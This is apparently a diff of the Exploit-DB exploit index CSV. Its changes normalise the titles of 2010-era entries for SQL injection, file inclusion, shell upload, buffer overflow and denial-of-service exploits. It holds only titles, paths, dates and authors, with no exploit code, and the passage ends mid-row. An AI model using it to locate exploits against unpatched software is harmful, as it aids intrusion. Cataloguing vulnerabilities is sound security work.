11560,platforms/php/webapps/11560.txt,"WikyBlog 1.7.3rc2 - Multiple Vulnerabilities",2010-02-24,"indoushka salah el ddine",php,webapps,0 11561,platforms/multiple/local/11561.html,"Mozilla Firefox 3.6 - URL Spoofing Vulnerability",2010-02-24,unknown,multiple,local,0 -11563,platforms/php/webapps/11563.txt,"kalimat new system v 1.0 (index.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 +11563,platforms/php/webapps/11563.txt,"kalimat new system 1.0 - (index.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 11564,platforms/php/webapps/11564.txt,"ShortCMS 1.11F(B) (con) - SQL Injection Vulnerability",2010-02-24,Gamoscu,php,webapps,0 11565,platforms/php/webapps/11565.txt,"phpCOIN 1.2.1 (mod.php) - SQL Injection Vulnerability",2010-02-24,Baybora,php,webapps,0 11567,platforms/multiple/dos/11567.txt,"Apple Safari 4.0.4 & Google Chrome 4.0.249 CSS style Stack Overflow DoS/PoC",2010-02-24,"Rad L. Sneak",multiple,dos,0 11568,platforms/php/webapps/11568.txt,"Softbiz Auktios Script Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0 -11569,platforms/php/webapps/11569.txt,"Web Server Creator - Web Portal v 0.1 Multi Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 +11569,platforms/php/webapps/11569.txt,"Web Server Creator Web Portal 0.1 - Multiple Vulnerabilities",2010-02-24,"indoushka salah el ddine",php,webapps,0 11570,platforms/php/webapps/11570.txt,"PBBoard 2.0.5 - Mullti Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 11571,platforms/php/webapps/11571.txt,"Maian Uploader 4.0 - Shell Upload Vulnerability",2010-02-24,"indoushka salah el ddine",php,webapps,0 -11573,platforms/windows/local/11573.c,"MediaCoder v0.7.3.4605 Local Buffer Overflow Exploit",2010-02-24,"fl0 fl0w",windows,local,0 +11573,platforms/windows/local/11573.c,"MediaCoder 0.7.3.4605 - Local Buffer Overflow Exploit",2010-02-24,"fl0 fl0w",windows,local,0 11574,platforms/hardware/dos/11574.py,"iPhone WebCore::CSSSelector() Remote Crash Vulnerability",2010-02-24,t12,hardware,dos,0 11575,platforms/php/webapps/11575.txt,"Softbiz Classifieds PLUS Multiple SQL Injection Vulnerabilities",2010-02-24,"Easy Laster",php,webapps,0 11576,platforms/php/webapps/11576.txt,"Softbiz Recipes Portal Script (showcats.php) SQL Injection Vulnerability",2010-02-25,"Easy Laster",php,webapps,0 @@ -10615,7 +10615,7 @@ id,file,description,date,author,platform,type,port 11605,platforms/php/webapps/11605.txt,"Baykus Yemek Tarifleri <= 2.1 SQL Injection Vulnerability",2010-02-28,cr4wl3r,php,webapps,0 11606,platforms/asp/webapps/11606.txt,"Majoda CMS (Auth Bypass) SQL Injection Vulnerability",2010-02-28,Phenom,asp,webapps,0 11608,platforms/hardware/dos/11608.rb,"iPhone / iTouch FTPDisc 1.0 3 ExploitsInOne Buffer Overflow DoS",2010-03-01,"Alberto Ortega",hardware,dos,0 -11609,platforms/php/webapps/11609.txt,"phptroubleticket (id) SQL Injection Vulnerability",2010-03-01,kaMtiEz,php,webapps,0 +11609,platforms/php/webapps/11609.txt,"phptroubleticket - (id) SQL Injection Vulnerability",2010-03-01,kaMtiEz,php,webapps,0 11610,platforms/php/webapps/11610.txt,"CMS by MyWorks Multiple Vulnerabilities",2010-03-01,Palyo34,php,webapps,0 11611,platforms/asp/webapps/11611.txt,"Al Sat Scripti Database Download Vulnerability",2010-03-02,"indoushka salah el ddine",asp,webapps,0 11612,platforms/php/webapps/11612.txt,"osCSS 1.2.1 - Database Backups Disclosure",2010-03-02,"indoushka salah el ddine",php,webapps,0 @@ -10641,7 +10641,7 @@ id,file,description,date,author,platform,type,port 11634,platforms/hardware/webapps/11634.pl,"Sagem Routers Remote Auth bypass Exploit",2010-03-04,AlpHaNiX,hardware,webapps,0 11635,platforms/php/webapps/11635.pl,"ONECMS 2.5 - SQL Injection Vulnerability",2010-03-05,"Ctacok and .:[melkiy]:",php,webapps,0 11636,platforms/php/webapps/11636.php,"Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)",2010-03-05,"Hamid Ebadi",php,webapps,0 -11637,platforms/php/webapps/11637.txt,"Auktionshaus 3.0.0.1 - news.php (id) SQL Injection Vulnerability",2010-03-05,"Easy Laster",php,webapps,0 +11637,platforms/php/webapps/11637.txt,"auktionshaus 3.0.0.1 - news.php - (id) SQL Injection Vulnerability",2010-03-05,"Easy Laster",php,webapps,0 11638,platforms/php/webapps/11638.txt,"E-topbiz Link ADS 1 PHP script (linkid) Blind SQL Injection Vulnerability",2010-03-05,JosS,php,webapps,0 11639,platforms/windows/dos/11639.txt,"Google Chrome 4.0.249 - XML Denial of Service PoC",2010-03-06,Blade,windows,dos,0 11641,platforms/php/webapps/11641.txt,"phpCOIN 1.2.1 (mod.php) LFI Vulnerability",2010-03-06,_mlk_,php,webapps,0 @@ -10649,7 +10649,7 @@ id,file,description,date,author,platform,type,port 11644,platforms/multiple/dos/11644.py,"Flare <= 0.6 Local Heap Overflow DoS",2010-03-06,l3D,multiple,dos,0 11646,platforms/php/webapps/11646.pl,"BigForum Version: 4.5 SQL INJECTION",2010-03-07,Ctacok,php,webapps,0 11647,platforms/windows/local/11647.pl,"Yahoo Player 1.0 - (.m3u/.pls/.ypl) Buffer Overflow Exploit (SEH)",2010-03-07,Mr.tro0oqy,windows,local,0 -11648,platforms/php/webapps/11648.txt,"Bild Flirt System 2.0 - index.php (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0 +11648,platforms/php/webapps/11648.txt,"bild flirt system 2.0 - index.php - (id) SQL Injection Vulnerability",2010-03-07,"Easy Laster",php,webapps,0 11650,platforms/windows/remote/11650.c,"Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit",2010-03-07,"Brett Gervasoni",windows,remote,0 11651,platforms/multiple/local/11651.txt,"Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4",2010-03-07,kingcope,multiple,local,0 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 m3u crash",2010-03-07,l3D,windows,dos,0 @@ -10668,7 +10668,7 @@ id,file,description,date,author,platform,type,port 11670,platforms/windows/dos/11670.py,"JAD java decompiler 1.5.8g (.class) Stack Overflow DoS",2010-03-09,l3D,windows,dos,0 11671,platforms/php/webapps/11671.txt,"mhproducts kleinanzeigenmarkt search.php SQL Injection",2010-03-09,"Easy Laster",php,webapps,0 11672,platforms/php/webapps/11672.txt,"Wild CMS SQL injection vulnerability",2010-03-09,Ariko-Security,php,webapps,0 -11674,platforms/php/webapps/11674.txt,"NUs Newssystem 1.02 - (id) SQL Injection Vulnerability",2010-03-09,n3w7u,php,webapps,0 +11674,platforms/php/webapps/11674.txt,"nus newssystem 1.02 - (id) SQL Injection Vulnerability",2010-03-09,n3w7u,php,webapps,0 11676,platforms/php/webapps/11676.txt,"Campsite 3.3.5 - CSRF Vulnerability",2010-03-10,"Pratul Agrawal",php,webapps,0 11677,platforms/hardware/webapps/11677.txt,"Friendly-Tech FriendlyTR69 CPE Remote Management 2.8.9 - SQL Injection Vulnerability",2010-03-10,"Yaniv Miron",hardware,webapps,0 11678,platforms/php/webapps/11678.txt,"PhpCityPortal Multiple Vulnerabilities",2010-03-10,R3d-D3v!L,php,webapps,0 @@ -10693,7 +10693,7 @@ id,file,description,date,author,platform,type,port 11699,platforms/php/webapps/11699.txt,"Joomla Component com_family SQL Injection Vulnerability",2010-03-12,"DevilZ TM",php,webapps,0 11701,platforms/php/webapps/11701.txt,"Easynet Forum Host (topic.php) SQL Injection Vulnerbility",2010-03-12,"Yakir Wizman",php,webapps,0 11702,platforms/php/webapps/11702.pl,"Invision Power Board Currency Mod(edit) SQL injection",2010-03-12,"Yakir Wizman",php,webapps,0 -11704,platforms/php/webapps/11704.txt,"dreamlive Auktionshaus script news.php (id) SQL Injection Vulnerability",2010-03-12,"Easy Laster",php,webapps,0 +11704,platforms/php/webapps/11704.txt,"dreamlive auktionshaus script news.php - (id) SQL Injection Vulnerability",2010-03-12,"Easy Laster",php,webapps,0 11705,platforms/multiple/dos/11705.c,"FreeBSD and OpenBSD 'ftpd' NULL Pointer Dereference Denial Of Service Vulnerability",2010-03-12,kingcope,multiple,dos,0 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader (.stats file) stack buffer Overflow poc",2010-03-12,ItSecTeam,windows,dos,0 11707,platforms/php/webapps/11707.txt,"Joomla Component com_juliaportfolio Local File Inclusion",2010-03-12,"DevilZ TM",php,webapps,80 @@ -10714,7 +10714,7 @@ id,file,description,date,author,platform,type,port 11724,platforms/windows/dos/11724.pl,"GOM Player 2.1.21 - (.avi) DoS",2010-03-14,En|gma7,windows,dos,0 11725,platforms/php/webapps/11725.txt,"Joomla Component com_org SQL Injection Vulnerability",2010-03-14,N2n-Hacker,php,webapps,0 11726,platforms/php/webapps/11726.txt,"PHP-Fusion <= 6.01.15.4 (downloads.php) SQL Injection Vulnerability",2010-03-14,Inj3ct0r,php,webapps,0 -11727,platforms/php/webapps/11727.txt,"Front Door v0.4b SQL Injection Vulnerability",2010-03-14,Blake,php,webapps,0 +11727,platforms/php/webapps/11727.txt,"Front Door 0.4b - SQL Injection Vulnerability",2010-03-14,Blake,php,webapps,0 11728,platforms/windows/dos/11728.pl,"Media Player 6.4.9.1 with K-Lite Codec Pack - DoS/Crash (.avi)",2010-03-14,En|gma7,windows,dos,0 11729,platforms/php/webapps/11729.txt,"DesktopOnNet 3 Beta9 Local File Include Vulnerability",2010-03-14,cr4wl3r,php,webapps,0 11730,platforms/php/webapps/11730.txt,"Joomla com_nfnaddressbook Remote Sql Injection Vulnerability",2010-03-14,Snakespc,php,webapps,0 @@ -10739,8 +10739,8 @@ id,file,description,date,author,platform,type,port 11749,platforms/php/webapps/11749.txt,"Subdreamer 3.0.1 - CMS upload Vulnerability",2010-03-15,"indoushka salah el ddine",php,webapps,0 11750,platforms/windows/remote/11750.html,"Liquid XML Studio 2010 <= 8.061970 - (LtXmlComHelp8.dll) OpenFile() Remote 0day Overflow Exploit",2010-03-15,mr_me,windows,remote,0 11752,platforms/php/webapps/11752.txt,"Joomla com_org SQL Injection Vulnerability (letter parameter)",2010-03-15,kazuya,php,webapps,0 -11754,platforms/php/webapps/11754.txt,"Address Book Script v 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0 -11755,platforms/php/webapps/11755.txt,"osDate v 2.1.9 - Remote File Inclusion Vulnerabilities",2010-03-15,NoGe,php,webapps,0 +11754,platforms/php/webapps/11754.txt,"Address Book Script 1.09 - Local File Inclusion",2010-03-15,"Pouya Daneshmand",php,webapps,0 +11755,platforms/php/webapps/11755.txt,"osDate 2.1.9 - Remote File Inclusion Vulnerabilities",2010-03-15,NoGe,php,webapps,0 11756,platforms/php/webapps/11756.txt,"Joomla Component com_linkr - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 11757,platforms/php/webapps/11757.txt,"Joomla Component com_janews - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 11758,platforms/php/webapps/11758.txt,"Joomla Component com_ganalytics - Local File Inclusion",2010-03-15,AtT4CKxT3rR0r1ST,php,webapps,0 @@ -10761,7 +10761,7 @@ id,file,description,date,author,platform,type,port 11774,platforms/php/webapps/11774.txt,"Online Community CMS by I-net SQL Injection Vulnerability",2010-03-16,"Th3 RDX",php,webapps,0 11775,platforms/php/webapps/11775.txt,"Short URL 1.01 - Local File Inclusion",2010-03-16,"Pouya Daneshmand",php,webapps,0 11776,platforms/php/webapps/11776.txt,"phpscripte24 Auktionshaus Community Standart System Blind SQL Injection",2010-03-16,"Easy Laster",php,webapps,0 -11777,platforms/php/webapps/11777.txt,"EGroupware 1.6.002 and EGroupware Premium Line 9.1 Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 +11777,platforms/php/webapps/11777.txt,"egroupware 1.6.002 and egroupware premium line 9.1 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11778,platforms/php/webapps/11778.txt,"OSSIM 2.2 - Multiple Vulnerabilities",2010-03-16,"Nahuel Grisolia",php,webapps,0 11779,platforms/windows/local/11779.pl,"Windisc Stack BOF exploit",2010-03-16,Rick2600,windows,local,0 11780,platforms/php/webapps/11780.html,"Clain_TIger_CMS CSRF Vulnerability",2010-03-17,"Pratul Agrawal",php,webapps,0 @@ -10786,9 +10786,9 @@ id,file,description,date,author,platform,type,port 11802,platforms/php/webapps/11802.txt,"philboard 1.02 - SQL Injection Vulnerability",2010-03-18,ViRuS_HiMa,php,webapps,0 11803,platforms/windows/dos/11803.txt,"Crimson Editor SEH Overwrite Vulnerability",2010-03-18,sharpe,windows,dos,0 11805,platforms/php/webapps/11805.txt,"phpscripte24 Niedrig Gebote Pro Auktions System II Blind SQL Injection",2010-03-18,"Easy Laster",php,webapps,0 -11806,platforms/php/webapps/11806.txt,"Nensor CMS 2.01 Multiple Remote Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0 +11806,platforms/php/webapps/11806.txt,"nensor cms 2.01 Multiple Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0 11807,platforms/php/webapps/11807.txt,"SOFTSAURUS 2.01 Multiple Remote File Include Vulnerabilities",2010-03-18,cr4wl3r,php,webapps,0 -11808,platforms/php/webapps/11808.txt,"Quality Point 1.0 NewsFeed (SQL/XSS) Multiple Remote Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 +11808,platforms/php/webapps/11808.txt,"quality point 1.0 newsfeed (sql/xss) Multiple Vulnerabilities",2010-03-19,Red-D3v1L,php,webapps,0 11809,platforms/windows/dos/11809.py,"eDisplay Personal FTP server 1.0.0 Pre-Authentication DoS (PoC)",2010-03-19,loneferret,windows,dos,21 11810,platforms/windows/dos/11810.py,"eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Crash SEH (PoC)",2010-03-19,loneferret,windows,dos,21 11811,platforms/php/webapps/11811.txt,"phpscripte24 Preisschlacht Liveshop System SQL Injection (seite&aid) index.php",2010-03-19,"Easy Laster",php,webapps,0 @@ -10817,13 +10817,13 @@ id,file,description,date,author,platform,type,port 11838,platforms/windows/dos/11838.php,"SAFARI APPLE 4.0.5 (object tag) (JavaScriptCore.dll) DoS (Crash)",2010-03-22,3lkt3F0k4,windows,dos,0 11839,platforms/windows/dos/11839.py,"Donar Player 2.2.0 Local Crash PoC",2010-03-22,b0telh0,windows,dos,0 11840,platforms/php/webapps/11840.txt,"PowieSys <= 0.7.7 alpha index.php (shownews) SQL Injection Vulnerability",2010-03-22,"Easy Laster",php,webapps,0 -11841,platforms/php/webapps/11841.txt,"New Advisore Stack Ver 1.1 Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 +11841,platforms/php/webapps/11841.txt,"new advisore stack ver 1.1 - Directory Traversal",2010-03-22,R3VAN_BASTARD,php,webapps,0 11842,platforms/windows/dos/11842.py,"FreeSSHD 1.2.4 Remote Buffer Overflow DoS",2010-03-22,Pi3rrot,windows,dos,0 11844,platforms/php/webapps/11844.txt,"Joomla Component com_flash SQL Injection Vulnerability",2010-03-22,"DevilZ TM",php,webapps,0 11845,platforms/php/webapps/11845.txt,"Joomla component com_jwmmxtd <= Remote File Inclusion Vulnerability",2010-03-23,eidelweiss,php,webapps,0 11846,platforms/php/webapps/11846.txt,"Uiga Business Portal <= index.php SQL Injection Vulnerability",2010-03-23,"Easy Laster",php,webapps,0 11847,platforms/windows/webapps/11847.txt,"Joomla Component com_gds SQL Injection Vulnerability",2010-03-23,"DevilZ TM",windows,webapps,0 -11848,platforms/php/webapps/11848.txt,"Insky CMS v006-0111 Multiple Remote File Include Vulnerability",2010-03-23,mat,php,webapps,0 +11848,platforms/php/webapps/11848.txt,"Insky CMS 006-0111 - Multiple Remote File Include Vulnerability",2010-03-23,Mat,php,webapps,0 11850,platforms/php/webapps/11850.txt,"Zephyrus CMS (index.php) SQL Injection Vulnerability",2010-03-23,Phenom,php,webapps,0 11851,platforms/php/webapps/11851.txt,"Joomla Component Property Local File Inclusion",2010-03-23,"Chip D3 Bi0s",php,webapps,0 11852,platforms/php/webapps/11852.txt,"Xataface Admin Auth Bypass Vulnerability",2010-03-23,Xinapse,php,webapps,0 @@ -10874,7 +10874,7 @@ id,file,description,date,author,platform,type,port 11905,platforms/php/webapps/11905.txt,"Simple Machines Forum <= 1.1.8 (avatar) Remote PHP File Execute PoC",2010-03-27,JosS,php,webapps,0 11906,platforms/php/webapps/11906.txt,"Uebimiau Webmail <= 2.7.2 Multiple Vulnerabilities.",2010-03-27,cp77fk4r,php,webapps,0 11908,platforms/php/webapps/11908.txt,"Joomla Component com_solution SQL Injection Vulnerability",2010-03-27,"DevilZ TM",php,webapps,0 -11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit",2010-03-28,"Hazem Mofeed",windows,local,0 +11909,platforms/windows/local/11909.txt,"Mini-stream Ripper 3.1.0.8 - Local stack overflow exploit",2010-03-28,"Hazem Mofeed",windows,local,0 11911,platforms/windows/local/11911.py,"Stud_PE <= 2.6.05 - Stack Overflow PoC exploit",2010-03-28,zha0,windows,local,0 11912,platforms/php/webapps/11912.txt,"Multi Auktions Komplett System 2 - Blind SQL Injection Exploit",2010-03-28,"Easy Laster",php,webapps,0 11914,platforms/php/webapps/11914.txt,"Joomla Component com_adds Blind SQL Injection Vulnerability",2010-03-28,"DevilZ TM",php,webapps,0 @@ -10921,7 +10921,7 @@ id,file,description,date,author,platform,type,port 11964,platforms/multiple/webapps/11964.pl,"Easy-Clanpage <= 2.1 - SQL Injection Exploit",2010-03-30,"Easy Laster",multiple,webapps,0 11965,platforms/php/webapps/11965.txt,"kora Reinstall Admin Information Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11966,platforms/windows/dos/11966.py,"Easy Icon Maker .ico File Reading Crash",2010-03-30,ItSecTeam,windows,dos,0 -11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery by Pass Remote Upload Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 +11967,platforms/php/webapps/11967.txt,"Snipe Photo Gallery - Bypass Remote Upload Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11968,platforms/php/webapps/11968.txt,"Hosting-php-dynamic (Auth Bypass) Vulnerability",2010-03-30,"indoushka salah el ddine",php,webapps,0 11973,platforms/windows/remote/11973.txt,"CompleteFTP Server Directory Traversal",2010-03-30,zombiefx,windows,remote,0 11974,platforms/windows/remote/11974.py,"HP OpenView NNM OvWebHelp.exe CGI Topic overflow",2010-03-30,"S2 Crew",windows,remote,0 @@ -10952,15 +10952,15 @@ id,file,description,date,author,platform,type,port 12001,platforms/windows/dos/12001.pl,"Kwik Pay Payroll 4.10.3 - (.zip) DoS",2010-04-01,Anonymous,windows,dos,0 12002,platforms/php/webapps/12002.txt,"Musicbox 3.3 - Upload Shell Vulnerability",2010-04-01,"indoushka salah el ddine",php,webapps,0 12003,platforms/php/webapps/12003.txt,"onepound Shop / CMS XSS and SQL Injection Vulnerabilities",2010-04-01,Valentin,php,webapps,0 -12004,platforms/php/webapps/12004.txt,"PHP Jokesite V 2.0 exec Command Exploit",2010-04-01,"indoushka salah el ddine",php,webapps,0 +12004,platforms/php/webapps/12004.txt,"PHP Jokesite 2.0 - exec Command Exploit",2010-04-01,"indoushka salah el ddine",php,webapps,0 12005,platforms/php/webapps/12005.txt,"Profi Einzelgebots Auktions System Blind SQL Injection Vulnerability",2010-04-01,"Easy Laster",php,webapps,0 12006,platforms/php/webapps/12006.txt,"Simple Calculator by Peter Rekdal Sunde Remote Upload Vulnerability",2010-04-01,"indoushka salah el ddine",php,webapps,0 12007,platforms/php/webapps/12007.txt,"SimpNews 2.16.2 and Below Multiple SQL Injection Vulnerabilities",2010-04-01,NoGe,php,webapps,0 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Zip File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12009,platforms/php/webapps/12009.html,"CMS Made Simple 1.7 CSRF Vulnerability",2010-04-02,"pratul agrawal",php,webapps,0 -12010,platforms/windows/dos/12010.pl,"uTorrent WebUI <= v0.370 Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0 +12010,platforms/windows/dos/12010.pl,"uTorrent WebUI <= 0.370 - Authorization header DoS Exploit",2010-04-02,"zombiefx darkernet",windows,dos,0 12011,platforms/windows/dos/12011.txt,"Google Chrome 4.1 OOB Array Indexing Bug",2010-04-02,"Tobias Klein",windows,dos,0 -12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 0 day",2010-04-02,"Richard Leahy",windows,local,0 +12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - (0day)",2010-04-02,"Richard Leahy",windows,local,0 12015,platforms/php/webapps/12015.txt,"Joomla Component com_menu SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12016,platforms/php/webapps/12016.txt,"Joomla Component com_ops SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 12017,platforms/php/webapps/12017.txt,"Joomla Component com_football SQL Injection Vulnerability",2010-04-02,"DevilZ TM",php,webapps,0 @@ -10978,7 +10978,7 @@ id,file,description,date,author,platform,type,port 12031,platforms/php/webapps/12031.html,"Advanced Management For Services Sites Remote Add Admin Exploit",2010-04-03,alnjm33,php,webapps,0 12032,platforms/windows/dos/12032.html,"Microsoft Internet Explorer Tabular Data Control ActiveX Remote Code Execution",2010-04-03,ZSploit.com,windows,dos,0 12033,platforms/multiple/remote/12033.txt,"Java Mini Web Server <= 1.0 Path Traversal and Cross Site Scripting",2010-04-03,cp77fk4r,multiple,remote,0 -12034,platforms/php/webapps/12034.txt,"FlatPress 0.909.1 Stored XSS Vulnerability",2010-04-03,ItSecTeam,php,webapps,0 +12034,platforms/php/webapps/12034.txt,"flatpress 0.909.1 - Stored XSS vulnerability",2010-04-03,ItSecTeam,php,webapps,0 12035,platforms/windows/local/12035.pl,"ZipScan 2.2c SEH",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12036,platforms/hardware/webapps/12036.txt,"Edimax AR-7084GA Router CSRF + Persistent XSS Exploit",2010-04-03,l3D,hardware,webapps,0 12037,platforms/php/webapps/12037.txt,"Joomla component jp_jobs SQL Injection Vulnerability",2010-04-03,Valentin,php,webapps,0 @@ -11053,7 +11053,7 @@ id,file,description,date,author,platform,type,port 12111,platforms/php/webapps/12111.txt,"Joomla Component Webee Comments Local File Inclusion Vulnerability",2010-04-08,AntiSecurity,php,webapps,0 12112,platforms/php/webapps/12112.txt,"Joomla Component Realtyna Translator Local File Inclusion Vulnerability",2010-04-08,AntiSecurity,php,webapps,0 12113,platforms/php/webapps/12113.txt,"Joomla Component AWDwall-Joomla LFI & SQLi [cbuser] Vulnerability",2010-04-08,AntiSecurity,php,webapps,0 -12114,platforms/multiple/remote/12114.txt,"Miniature Java Web Server <= 1.71 Multiple Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0 +12114,platforms/multiple/remote/12114.txt,"miniature java web server <= 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0 12115,platforms/php/webapps/12115.txt,"Kubeit CMS Remote SQL Injection Vulnerability",2010-04-08,Phenom,php,webapps,0 12117,platforms/windows/remote/12117.txt,"Java Deployment Toolkit Performs Insufficient Validation of Parameters",2010-04-09,"Tavis Ormandy",windows,remote,0 12118,platforms/php/webapps/12118.txt,"Joomla Component PowerMail Pro com_powermail Local File Inclusion Vulnerability",2010-04-09,AntiSecurity,php,webapps,0 @@ -11066,7 +11066,7 @@ id,file,description,date,author,platform,type,port 12128,platforms/php/webapps/12128.txt,"GarageSales Remote Upload Vulnerability",2010-04-09,saidinh0,php,webapps,0 12130,platforms/linux/local/12130.py,"Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation",2010-04-09,"Jon Oberheide",linux,local,0 12131,platforms/windows/dos/12131.py,"Tembria Server Monitor 5.6.0 - Denial of Service",2010-04-09,Lincoln,windows,dos,0 -12132,platforms/php/webapps/12132.pl,"Joomla Component com_agenda 1.0.1 (id) SQL Injection Vulnerability",2010-04-09,v3n0m,php,webapps,0 +12132,platforms/php/webapps/12132.pl,"joomla component com_agenda 1.0.1 - (id) SQL Injection Vulnerability",2010-04-09,v3n0m,php,webapps,0 12133,platforms/multiple/webapps/12133.txt,"Asset Manager 1.0 Shell Upload Vulnerability",2010-04-09,"Shichemt Alen and NeT_Own3r",multiple,webapps,0 12134,platforms/php/webapps/12134.txt,"MMHAQ CMS sqli vulnersbility",2010-04-10,s1ayer,php,webapps,0 12135,platforms/php/webapps/12135.txt,"mygamingladder MGL Combo System <= 7.5 SQL injection",2010-04-10,"Easy Laster",php,webapps,0 @@ -11098,7 +11098,7 @@ id,file,description,date,author,platform,type,port 12161,platforms/windows/dos/12161.pl,"Aladdin eToken PKI Client 4.5 - Virtual File Handling Unspecified Memory Corruption PoC",2010-04-11,LiquidWorm,windows,dos,0 12162,platforms/php/webapps/12162.txt,"Joomla component mv_restaurantmenumanager SQL injection Vulnerability",2010-04-11,Sudden_death,php,webapps,0 12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS SQL Injection Vulnerability",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0 -12164,platforms/php/webapps/12164.txt,"YaPig v0.94.0u Remote File Inclusion Vulnerability",2010-04-12,JIKO,php,webapps,0 +12164,platforms/php/webapps/12164.txt,"YaPig 0.94.0u - Remote File Inclusion Vulnerability",2010-04-12,JiKo,php,webapps,0 12165,platforms/multiple/dos/12165.txt,"PHP 5.3.0 getopt() Denial of Service",2010-04-12,Napst3r,multiple,dos,0 12166,platforms/php/webapps/12166.txt,"Joomla Component Web TV com_webtv Local File Inclusion Vulnerability",2010-04-12,AntiSecurity,php,webapps,0 12167,platforms/php/webapps/12167.txt,"Joomla Component Horoscope com_horoscope Local File Inclusion Vulnerability",2010-04-12,AntiSecurity,php,webapps,0 @@ -11125,8 +11125,8 @@ id,file,description,date,author,platform,type,port 12188,platforms/multiple/dos/12188.txt,"VMware Remote Console e.x.p build-158248 - format string vulnerability",2010-04-12,"Alexey Sintsov",multiple,dos,0 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev str_transliterate() Buffer overflow - NX + ASLR Bypass",2010-04-13,ryujin,windows,local,0 12190,platforms/php/webapps/12190.txt,"Joomla Component Jvehicles (aid) SQL Injection Vulnerability",2010-04-13,"Don Tukulesto",php,webapps,0 -12191,platforms/php/webapps/12191.txt,"Joomla Component com_jp_jobs 1.2.0 (id) SQL Injection Vulnerability",2010-04-13,v3n0m,php,webapps,0 -12192,platforms/php/webapps/12192.txt,"Blog System <= 1.5 Multiple Vulnerabilities",2010-04-13,cp77fk4r,php,webapps,0 +12191,platforms/php/webapps/12191.txt,"joomla component com_jp_jobs 1.2.0 - (id) SQL Injection Vulnerability",2010-04-13,v3n0m,php,webapps,0 +12192,platforms/php/webapps/12192.txt,"blog system <= 1.5 - Multiple Vulnerabilities",2010-04-13,cp77fk4r,php,webapps,0 12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,cr4wl3r,php,webapps,0 12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta (RFI/LFI) Multiple File Include Vulnerability",2010-04-13,cr4wl3r,php,webapps,0 12195,platforms/php/webapps/12195.rb,"joelz bulletin board <= 0.9.9rc3 multiple SQL Injection & Exploit",2010-04-13,"Easy Laster",php,webapps,0 @@ -11151,7 +11151,7 @@ id,file,description,date,author,platform,type,port 12221,platforms/php/webapps/12221.rb,"Bild Flirt <= 1.0 - SQL Injection Vulnerability Exploit",2010-04-14,"Easy Laster",php,webapps,0 12222,platforms/php/webapps/12222.txt,"PhpMesFilms 1.8 SQL Injection Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 12223,platforms/php/webapps/12223.txt,"Multi-Mirror Remote Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 -12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host V 4.0.0 Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 +12224,platforms/php/webapps/12224.txt,"Mihalism Multi Host 4.0.0 - Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 12226,platforms/php/webapps/12226.txt,"Magic Uploader Mini Upload Vulnerability",2010-04-14,"indoushka salah el ddine",php,webapps,0 12227,platforms/php/webapps/12227.txt,"YUI Images Script Shell Upload Vulnerability",2010-04-14,Mr.P3rfekT,php,webapps,0 12228,platforms/windows/dos/12228.py,"MovieLibrary 1.4.401 - Local DoS (.dmv)",2010-04-14,Anonymous,windows,dos,0 @@ -11172,7 +11172,7 @@ id,file,description,date,author,platform,type,port 12243,platforms/windows/dos/12243.py,"RPM Select/Elite 5.0 - (.xml config parsing) Unicode Buffer Overflow PoC",2010-04-14,mr_me,windows,dos,0 12244,platforms/windows/remote/12244.txt,"iMesh <= 7.1.0.x (IMWeb.dll 7.0.0.x) Remote Heap Overflow Exploit",2007-12-18,rgod,windows,remote,0 12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script buyers_subcategories SQL Injection Vulnerability",2010-04-15,"AnGrY BoY",php,webapps,0 -12246,platforms/php/webapps/12246.txt,"Joomla Component com_iproperty 1.5.3 (id) SQL Injection Vulnerability",2010-04-15,v3n0m,php,webapps,0 +12246,platforms/php/webapps/12246.txt,"joomla component com_iproperty 